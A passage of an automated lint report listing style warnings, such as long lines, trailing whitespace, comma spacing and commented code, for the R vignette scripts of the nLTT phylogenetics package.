^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:100:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L100) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:104:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L104) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:105:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L105) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny1), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:108:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L108) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:109:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L109) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny2), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:112:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L112) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:116:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L116) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:117:41:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L117) *style:* **Commas should always have a space after.**\n```r\n​t <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.2)\n                                        ^\n```\n[inst/doc/vignette_get_nltt_values.R:120:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L120) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:121:42:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L121) *style:* **Commas should always have a space after.**\n```r\n​df <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.01)\n                                         ^\n```\n[inst/doc/vignette_get_nltt_values.R:123:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L123) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:124:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L124) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:124:54:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L124) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:124:129:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L124) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                                                                                                ^\n```\n[inst/doc/vignette_get_nltt_values.R:127:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L127) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:128:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L128) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:128:54:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L128) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:128:102:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L128) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:131:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L131) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:140:53:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L140) *style:* **Trailing whitespace is superfluous.**\n```r\n​phylogenies <- c(phylogeny1, phylogeny2, phylogeny3, \n                                                    ^\n```\n[inst/doc/vignette_get_nltt_values.R:143:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L143) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:147:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L147) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:148:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L148) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:148:54:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L148) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:148:129:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L148) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                                                                                                ^\n```\n[inst/doc/vignette_get_nltt_values.R:151:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L151) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:152:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L152) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:152:54:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L152) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:152:102:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L152) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:154:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L154) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_nltt_statistic.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:2:9:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​library(nLTT)\n        ^~~~\n```\n[inst/doc/vignette_nltt_statistic.R:4:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L4) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:7:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L7) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:10:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L10) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:13:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L13) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 4---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:21:22:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​  ape::rcoal(n = 10), \n                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:22:22:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​  ape::rcoal(n = 10), \n                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:23:16:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  species_tree, \n               ^\n```\n[inst/doc/vignette_nltt_statistic.R:27:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L27) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 10--------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:35:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L35) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 7---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:39:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L39) *style:* **lines should not be more than 80 characters.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:39:20:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                   ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:34:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                                 ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:48:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                                               ^\n```\n[inst/doc/vignette_nltt_statistic.R:45:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n​  nLTT::nltt_lines(p, lwd = 3, lty = 2, col = grDevices::heat.colors(n = 4)[col_index])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:49:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L49) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:54:27:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L54) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nltt_stats_exact[i]  <- nLTTstat_exact(species_tree, p)\n                          ^~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:55:27:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L55) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nltt_stats_approx[i] <- nLTTstat(species_tree, p)\n                          ^~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:59:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L59) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:62:38:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nltt_stat_exact = nltt_stats_exact, \n                                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:69:14:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L69) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nltt_stats, \n             ^\n```\n[inst/doc/vignette_nltt_statistic.R:70:21:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L70) *style:* **Trailing whitespace is superfluous.**\n```r\n​  id.vars = c(\"id\"), \n                    ^\n```\n[inst/doc/vignette_nltt_statistic.R:76:13:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L76) *style:* **Trailing whitespace is superfluous.**\n```r\n​  df$method, \n            ^\n```\n[inst/doc/vignette_nltt_statistic.R:80:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L80) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:82:13:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​  data = df, \n            ^\n```\n[inst/doc/vignette_nltt_statistic.R:89:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_nltt_statistic.R#L89) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:3:9:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L3) *style:* **Variable and function names should be all lowercase.**\n```r\n​library(nLTT)\n        ^~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:10:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L10) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:12:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L12) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:15:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L15) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:21:27:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:23:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L23) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:25:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L25) *style:* **lines should not be more than 80 characters.**\n```r\n​stretch_matrix <- nLTT::stretch_nltt_matrix(nltt, dt = 0.25, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:28:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L28) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:30:27:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L30) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:31:37:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​points(stretch_matrix, pch = 19, col=\"blue\")\n                                   